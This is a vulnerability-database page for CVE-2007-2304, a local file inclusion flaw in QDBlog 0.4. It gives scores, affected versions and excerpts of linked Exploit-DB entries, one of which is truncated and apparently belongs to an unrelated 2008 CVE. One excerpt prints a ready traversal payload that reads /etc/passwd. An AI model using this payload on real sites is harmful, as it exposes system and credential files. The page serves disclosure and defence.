CVE-2007-2304
published 2007-04-26CVE-2007-2304: Multiple directory traversal vulnerabilities in Quick and Dirty Blog (QDBlog) 0.4, and possibly earlier, allow remote attackers to include and execute…
PriorityP338high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.69%
84.0th percentile
Multiple directory traversal vulnerabilities in Quick and Dirty Blog (QDBlog) 0.4, and possibly earlier, allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the theme parameter to categories.php and other unspecified files.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| qdblog | qdblog | <= 0.4 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Core Image Fun House 2.0 (OSX) - Arbitrary Code Execution (PoC)
exploitdb·2008-07-11
CVE-2008-2304 Core Image Fun House 2.0 (OSX) - Arbitrary Code Execution (PoC)
Core Image Fun House 2.0 (OSX) - Arbitrary Code Execution (PoC)
---
#!/usr/bin/ruby
# Copyright (c) Netragard, LLC. [email protected]
#
# /Developer/Applications/Graphics Tools/Core Image Fun House.app
# /Contents/MacOS/Core Image Fun House
#
# (gdb) x/10s 0xbfffddf7
# 0xbfffddf7: 'Z' , "DCBA center"
#
# 2007-07-10 21:15:34.573 Core Image Fun House[1061] CFLog (0):
# CFPropertyListCreateFromXMLData(): plist parse failed;
# the data is notproper UTF-8. The file name for this data
# could be:
$
# /Users/test/Desktop/SuperTastey.funhouse/file.xml
# The parser will retry as in 10.2, but the problem should be
# corrected in the plist.
#
# \x80-\xFF range that do not form proper utf8
len = 300
fname = "SuperTastey"
retaddr = 0x0d0d0d0d # There are lots of filtered chars!
if File.exist?(fn
Exploit-DB
Quick and Dirty Blog (qdblog) 0.4 - 'categories.php' Local File Inclusion
exploitdb·2007-11-03
CVE-2007-2304 Quick and Dirty Blog (qdblog) 0.4 - 'categories.php' Local File Inclusion
Quick and Dirty Blog (qdblog) 0.4 - 'categories.php' Local File Inclusion
---
Quick and Dirty Blog 0.4 (categories.php) Local File Inclusion Vulnerability
http://heanet.dl.sourceforge.net/sourceforge/qdblog/qdblog-0.4.tar.bz2
POC:
/categories.php?theme=../../../../../../../../../etc/passwd%00
# milw0rm.com [2007-11-03]
Exploit-DB
Quick and Dirty Blog (qdblog) 0.4 - SQL Injection / Local File Inclusion
exploitdb·2007-04-13
CVE-2007-2305 Quick and Dirty Blog (qdblog) 0.4 - SQL Injection / Local File Inclusion
Quick and Dirty Blog (qdblog) 0.4 - SQL Injection / Local File Inclusion
---
. . .
._ | _. .|_ _. _.;_/
[_)|(_]\_|[ )(_](_.| \.net
| ._|
"QDBlog v0.4 - MULTIPLE VULNERABILITIES"
by Omni
1) Infos
Date : 2007-04-12
Product : QDBlog
Version : v0.4 - Prior version maybe also be affected
Vendor : http://sourceforge.net/projects/qdblog/
Vendor Status : 2007-04-12 -> Not Informed!
Description : QDBlog is an open-source, simple, minimalistic blogging solution. It makes use of PHP and MySQL. It is
tiny (goal size is <50kb), and flexible. It designed to be based around choice. However it is
more targeted toward the adept user/web master.
Source : omnipresent - omni
E-mail : omnipresent[at]email[dot]it - omni[at]playhack[dot]net
Team : Playhack.net Security
2) Security Issues
--- [ SQL Injecti
No writeups or analysis indexed.
http://www.attrition.org/pipermail/vim/2007-April/001544.htmlhttp://www.securityfocus.com/bid/23485http://www.vupen.com/english/advisories/2007/1387https://exchange.xforce.ibmcloud.com/vulnerabilities/33634https://www.exploit-db.com/exploits/3729http://www.attrition.org/pipermail/vim/2007-April/001544.htmlhttp://www.securityfocus.com/bid/23485http://www.vupen.com/english/advisories/2007/1387https://exchange.xforce.ibmcloud.com/vulnerabilities/33634https://www.exploit-db.com/exploits/3729
2007-04-26
Published